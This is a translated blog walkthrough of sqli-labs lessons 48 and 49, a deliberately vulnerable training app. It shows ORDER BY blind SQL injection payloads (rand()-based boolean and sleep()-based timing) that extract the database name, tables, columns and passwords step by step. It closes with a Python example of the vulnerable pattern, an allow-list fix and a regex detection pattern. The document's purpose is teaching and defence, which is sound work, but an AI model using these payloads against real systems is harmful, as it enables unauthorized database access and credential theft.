(Manual) [sqli-labs 48, 49] ORDER BY injection, blind injection, GET injection
2022-07-16 15:13:00 【黑色地带(崛起)】
Contents
3. Less48 (GET - Error based - Blind - Numeric - ORDER BY CLAUSE)
4. Less49 (GET - Error based - String - Blind ORDER BY CLAUSE)
1. Recommended reading:
[SQL injection] Stacked injection: https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501
[SQL injection] Numeric injection & string injection: https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185%5Ev2%5Econtrol&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450
[SQL injection, no output] Boolean-based blind injection: principle, functions, exploitation process: https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
[SQL injection, no output] Time-based blind injection: principle, functions, exploitation process: https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185%5Ev2%5Econtrol&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450
2. Basic steps of (manual) SQL injection:
Step 1: test the injection point
Step 2: analyse privileges
Step 3: determine the number of columns
Step 4: dump the database name
Step 5: dump the table names
Step 6: dump the column names
Step 7: dump the data
3. Less48 (GET - Error based - Blind - Numeric - ORDER BY CLAUSE)
3.1 Overview: (ORDER BY injection, blind injection, GET injection)
Request method: GET
Technique: ORDER BY injection + blind injection + numeric injection
3.2 Step 1: test the injection point
As the hint says, request ?sort=1
Then append '
The page no longer renders normally, so an injection point exists
No error message is shown, so blind injection (boolean-based or time-based) is the way in
?sort=rand(true)
?sort=rand(false)
The two requests return the rows in different orders: in MySQL rand() with a fixed seed is repeatable, so rand(true) and rand(false) sort the result set differently, and a condition placed inside rand() can be read from which order comes back. Boolean-based blind injection is therefore possible
3.3 Step 2: analyse the filtering
Method 1:
Replace the characters of the injection statement one at a time until it stops erroring (time-consuming)
Or replace them all at once (if it errors, you do not know which character was filtered)
Method 2:
Obtain the source code and do a white-box review (best)
3.4 Step 3: determine the number of columns / output positions
?sort=3
Renders normally
?sort=4
Errors
So there are 3 columns
3.5 Step 4: dump the database name
?sort=rand(left(database(),1)>'s')
The result is the same as rand(false)
So this condition is false
Eventually we arrive at
?sort=rand(left(database(),1)='s')
The result is the same as rand(true)
So the condition is true
The first character is s
Continuing in the same way gives security
(by changing the position being tested)
Or (time-based blind injection)
?sort=1 and if(substr(database(),1,1)='s',sleep(5),0)
3.6 Step 5: dump the table names
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)>'e')
The result is the same as rand(false)
So this condition is false
?sort=rand(left((select group_concat(table_name) from information_schema.tables where table_schema=database()),1)='e')
The result is the same as rand(true)
So the condition is true
Deduce the tables one by one
emails referers uagents users
Or (time-based blind injection)
?sort=1 and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),0)
3.7 Step 6: dump the column names
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)>'u')
The result is the same as rand(false)
So this condition is false
?sort=rand(left((select group_concat(column_name) from information_schema.columns where table_name='users'),1)='u')
The result is the same as rand(true)
So the condition is true
Continue in the same way to get the columns
Or (time-based blind injection)
?sort=1 and if(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='u',sleep(5),0)
3.8 Step 7: dump the data
?sort=rand(left((select group_concat(password) from security.users),1)>'1')
The result is the same as rand(false)
So this condition is false
?sort=rand(left((select group_concat(password) from security.users),1)='1')
The result is the same as rand(true)
So the condition is true
Or (time-based blind injection)
?sort=1 and if(substr((select group_concat(username,password) from security.users limit 0,1),1,1)='d',sleep(5),0)
4. Less49 (GET - Error based - String - Blind ORDER BY CLAUSE)
4.1 Overview: (ORDER BY injection, blind injection, GET injection)
Request method: GET
Technique: ORDER BY injection + blind injection + string injection
4.2 Exploitation:
Compared with Less48
The sort value is placed inside single quotes, so the ' has to be closed first
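The root cause in both Less48 and Less49 is that the sort parameter is concatenated into the ORDER BY clause, and ORDER BY cannot take a bound parameter, so quoting or escaping (the Less49 variant) does not help. The following is an added example, not sqli-labs code: it shows the vulnerable concatenation beside an allow-list fix and a log-side check, using a constructed SQLite table that mirrors the lab's users table (id, username, password); it is written in Python rather than the lab's PHP.

```python
import re
import sqlite3

# Constructed demo rows mirroring the sqli-labs "users" table (id, username, password).
_ROWS = [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "Dummy", "p@ssword")]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", _ROWS)
    return conn


def vulnerable_query(sort):
    """Less48 pattern: the client value is glued into ORDER BY, so any expression
    (a rand() condition, an if(...,sleep(),0)) becomes part of the statement."""
    return "SELECT * FROM users ORDER BY " + sort


# Allow-list: the only sort targets the application actually offers.
# Keys are what the client may send; values are the only strings that reach SQL.
_SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}


def safe_query(sort, direction="asc"):
    """Hardened form: map the client value onto a known column and direction.
    Unknown or quoted values (the Less49 case) fall back to the default column."""
    column = _SORT_COLUMNS.get(str(sort), "id")
    order = "DESC" if str(direction).lower() == "desc" else "ASC"
    return f"SELECT * FROM users ORDER BY {column} {order}"


def run(sql):
    """Execute a statement against the constructed demo table and return all rows."""
    conn = _connect()
    try:
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


# Detection side: a legitimate sort value is an ordinal or a column name, so a
# function call, subquery, information_schema reference or quote in it is a
# strong signal in access logs or at a WAF.
_SUSPICIOUS = re.compile(
    r"\b(rand|sleep|if|benchmark|substr|left)\s*\(|information_schema|\bselect\b|'", re.I
)


def is_suspicious_sort(value):
    return bool(_SUSPICIOUS.search(value))
```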